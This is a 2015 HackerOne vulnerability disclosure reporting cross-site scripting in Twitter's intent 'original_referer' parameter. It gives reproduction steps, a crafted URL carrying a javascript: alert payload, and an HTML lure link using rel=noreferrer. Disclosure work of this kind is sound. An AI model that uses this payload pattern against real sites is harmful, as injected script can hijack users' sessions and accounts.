Twitter: XSS in original referrer after follow

2015-03-05T11:34:49
ID H1:50134
Type hackerone
Reporter akhil-reni
Modified 2015-03-09T18:37:58

Description

Hey hi,

There is a XSS in the intent functionality ,

Steps to reproduce

1) copy paste the following Link https://twitter.com/intent/favorite/complete?tweet_id=572435913768366080&already_favorited=false&original_referer=javascript:alert%281%29;

2) Click follow

3) now click return to previous site, you will see a xss triggered.

Requirements

  • Make sure you pick a tweet of a user , that you don't follow.
  • to execute you need to send a null referrer.

Here is the html code to attack victims

<html> <a href="https://twitter.com/intent/favorite/complete?tweet_id=572435913768366080&already_favorited=false&original_referer=javascript:alert%281%29; " rel="noreferrer">click here and follow</a> </html>

a rel=noreferrer will do our work.

Regards Wesecureapp